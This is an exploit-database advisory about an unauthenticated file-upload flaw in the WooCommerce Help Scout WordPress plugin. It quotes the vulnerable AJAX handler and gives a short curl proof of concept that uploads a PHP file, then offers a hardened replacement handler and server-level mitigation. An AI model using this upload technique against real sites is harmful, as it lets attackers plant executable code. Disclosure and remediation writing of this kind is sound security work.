## https://sploitus.com/exploit?id=WPEX-ID:CF9305E8-F5BC-45C3-82DB-0EF00FD46129
The file /woocommerce-help-scout/includes/class-wc-help-scout-ajax.php defines the class WC_Help_Scout_Ajax, whose constructor registers the action

    add_action( 'wp_ajax_nopriv_wc_help_scout_upload_attachments', array( $this, 'wc_help_scout_upload_attachments' ) );

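Because the action is registered under the wp_ajax_nopriv_ hook, the handler can be called without authentication. It reads the uploaded $_FILES and then executes

    $target_path_sia = $_FILES["file"]["name"];
    move_uploaded_file($_FILES["file"]["tmp_name"],$dir. "/hstmp/" . $target_path_sia);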


I.e., an attacker can run

    echo '<?php echo "Hello World!";' > helloworld.php

    curl -X POST -F file=@helloworld.php https://<site>/wp-admin/admin-ajax.php?action=wc_help_scout_upload_attachments

to exploit this vulnerability.
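For comparison with the handler above, a hardened upload handler is sketched below as an added example; it is not the plugin's own code or the vendor's patch. The function name, the nonce action 'wc_help_scout_upload', the 'security' field name, the MIME allow-list, and the assumption that only logged-in users upload attachments are all illustrative.

```php
<?php
// Added example, not the plugin's code. Assumptions: uploads come from logged-in
// users, the nonce action/field names, and the allow-list of file types below.

// Register only the authenticated hook; there is no wp_ajax_nopriv_ registration.
add_action( 'wp_ajax_wc_help_scout_upload_attachments', 'example_hs_upload_attachments' );

function example_hs_upload_attachments() {
    // Require a valid nonce; on failure WordPress stops the request with HTTP 403.
    check_ajax_referer( 'wc_help_scout_upload', 'security' );

    if ( empty( $_FILES['file'] ) || UPLOAD_ERR_OK !== $_FILES['file']['error'] ) {
        wp_send_json_error( 'No file uploaded.', 400 );
    }

    // wp_handle_upload() is defined in an admin include that may not be loaded yet.
    require_once ABSPATH . 'wp-admin/includes/file.php';

    // Allow-list of extension => MIME type. Anything else, including .php, is refused.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'pdf'      => 'application/pdf',
        'txt'      => 'text/plain',
    );

    // Instead of trusting $_FILES["file"]["name"], let WordPress validate the type
    // against the allow-list, sanitize and de-duplicate the name, and move the file
    // into the uploads directory.
    $result = wp_handle_upload(
        $_FILES['file'],
        array(
            'test_form' => false,    // the AJAX request carries no form 'action' field
            'mimes'     => $allowed,
        )
    );

    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }

    // Return only the stored base name, not the server path.
    wp_send_json_success( array( 'file' => basename( $result['file'] ) ) );
}
```

Disabling PHP execution in the upload directory at the web-server level is a useful second layer, since it limits the impact if a type check is ever bypassed.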